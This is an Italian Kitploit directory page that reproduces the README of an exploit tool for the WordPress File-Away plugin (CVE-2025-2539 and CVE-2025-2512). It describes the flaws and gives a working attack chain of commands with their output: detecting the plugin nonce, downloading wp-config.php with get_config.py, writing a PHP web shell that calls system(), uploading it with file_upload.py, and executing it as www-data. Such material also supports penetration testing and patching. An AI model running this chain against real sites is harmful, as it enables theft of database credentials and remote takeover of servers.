Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
file-away-exploit — Script di exploit per l'esecuzione di codice remoto per il plugin WordPress File-Away (CVE-2025-2512 & CVE-2025-2539) | Kitploit
Strumenti/GitHubGitHub/whattheslime/file-away-exploit
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration TestingSviluppo Payload
GitHubwhattheslime/file-away-exploit

file-away-exploit

Script di exploit per l'esecuzione di codice remoto per il plugin WordPress File-Away (CVE-2025-2512 & CVE-2025-2539)

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sito web
Condividi

File-Away Exploit (CVE-2025-2539 e CVE-2025-2512)

📌 Scopo

Questo repository contiene i dettagli delle vulnerabilità e gli script trovati per File-Away, un plugin WordPress utilizzato per la gestione dei file.

Questo plugin presenta due vulnerabilità che possono portare all'esecuzione remota di codice (Testato su File-Away 3.9.9.0.1):

  • CVE-2025-2539: Lettura arbitraria di file non autenticata
  • CVE-2025-2512: Caricamento arbitrario di file non autenticato

📖 Lettura arbitraria di file non autenticata

Il plugin File-Away per WordPress è vulnerabile alla lettura arbitraria di file non autenticata in tutte le versioni fino alla 3.9.9.0.1 inclusa.

Questa vulnerabilità esiste a causa di due problemi: la mancanza di verifica dell'autenticazione nella funzione lib/cls/class.fileaway_stats.php:file_away_stats->ajax() e l'uso di un algoritmo di crittografia debole nella funzione lib/cls/class.fileaway_encrypted.php:fileaway_encrypted->encrypt().

Ciò consente a utenti non autenticati di leggere file arbitrari, incluso il file di configurazione di WordPress (wp-config.php).

📁 Caricamento arbitrario di file non autenticato

Il plugin File-Away per WordPress è vulnerabile al caricamento arbitrario di file non autenticato in tutte le versioni fino alla 3.9.9.0.1 inclusa.

Questa vulnerabilità esiste a causa di due problemi: la mancanza di verifica dell'autenticazione e la scarsa verifica del tipo di file, entrambi nella funzione lib/cls/class.fileaway_management.php:fileaway_management->upload().

Ciò consente a utenti non autenticati di caricare file arbitrari che possono portare all'esecuzione di codice.

🔍 Rilevamento

Se il plugin file-away è installato e attivo sull'istanza WordPress di destinazione, il nonce fileaway_stats dovrebbe essere presente nella pagina principale:

root@kitploit:~
curl -sk http://127.0.0.1:8000/ | grep -E '^var fileaway_stats.*nonce\":\"([a-f0-9]+)\"};$'
root@kitploit:~
var fileaway_stats = {"ajaxurl":"http:\/\/127.0.0.1:8000\/wp-admin\/admin-ajax.php","nonce":"ff57064c96"};

🐞 Passaggi di sfruttamento

  1. Installa i requisiti python:

    root@kitploit:~
    python3 -m venv venv && venv/bin/pip install httpx
    
  2. Utilizza la vulnerabilità di lettura arbitraria di file per ottenere il file di configurazione dell'istanza WordPress (wp-config.php):

    root@kitploit:~
    venv/bin/python3 get_config.py -t http://127.0.0.1:8000
    
    root@kitploit:~
    [+] File-Away nonce:          ff57064c96
    [-] Encrypted web root:       LcZh3iec7c3vfHRt2C8=
    [-] Decoder:                  .i%B7%1Dy%F8%21%8A9%25%9Az%29%AA%BB-%BA%FC1%CB%3D5%DB~9%EB%BF%3D
    [-] Charset:                  abcdefghijklmnopqrstuvwxyz0123456789
    [+] Encryption Key:           f2379aghijklmnopqrstuvwxyz65bc410d8e
    [+] Decrypted web root:       /var/www/html
    [+] Config file downloaded:   127.0.0.1:8000_wp-config.php
    
  3. Crea un file PHP da caricare:

    root@kitploit:~
    echo '<?php system("id"); ?>' > /tmp/exec.php
    
  4. Utilizza la vulnerabilità di caricamento arbitrario di file per caricare il file sul server:

Scarica lo strumento
PHP
root@kitploit:~
venv/bin/python3 file_upload.py -t http://127.0.0.1:8000 -c 127.0.0.1:8000_wp-config.php -w /var/www/html/ -f /tmp/exec.php
root@kitploit:~
[-] nonce:            4810861b18
[-] upload_nonce:     0c3f44ae83
[-] loc_nonce:        a17a2df989
[+] File uploaded:    http://127.0.0.1:8000/wp-content/exec.php

⚠️ Il file viene caricato nella directory wp-content per impostazione predefinita ⚠️

  • Accedi al file PHP caricato:

    root@kitploit:~
    curl -sk http://127.0.0.1:8000/wp-content/exec.php
    
    root@kitploit:~
    uid=33(www-data) gid=33(www-data) groups=33(www-data)